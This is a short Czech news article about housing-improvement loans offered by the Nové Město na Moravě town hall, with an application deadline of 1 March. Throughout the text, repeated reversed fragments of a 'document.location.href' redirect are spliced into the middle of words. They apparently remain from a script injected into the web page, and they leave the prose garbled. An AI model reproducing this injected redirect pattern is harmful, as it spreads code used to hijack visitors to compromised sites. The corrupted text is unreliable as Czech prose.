Rainbow page separator

Ve Městě se mohou lidé zajímat o půjčky na vylepšení bydlení

Sobota, 23. ledna 2016

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Peníze na opravy nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí si mohou i le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos vypůjčit obyvatelé Nového Města od novoměstské radnice. Ta vyhlásila první kolo posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování půjček z fondu rozvoje bydlení. O finance mohou zájemci žádat do 1. března.
Půjčku z fondu s nízkou úrokovou sazbou ve výši necelá dvě procenta je možné použít například na rekonstrukce bytů, [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topení či elektroinstalace, na půdní vestavby, výměnu oken a dveří, novou fasádu a podobná vylepšení bydlení.
O peníze se mohou zajímat nejenom soukromí majitelé domů či bytů, ale i sdružení majitelů vlastníků. Každoročně je z fondu, v němž novoměstská radnice deponuje kolem čtyř milionů korun, rozpůjčováno osm set tisíc až milion korun, další finance se do něj průběžně vracejí formou splátek příjemců půjček.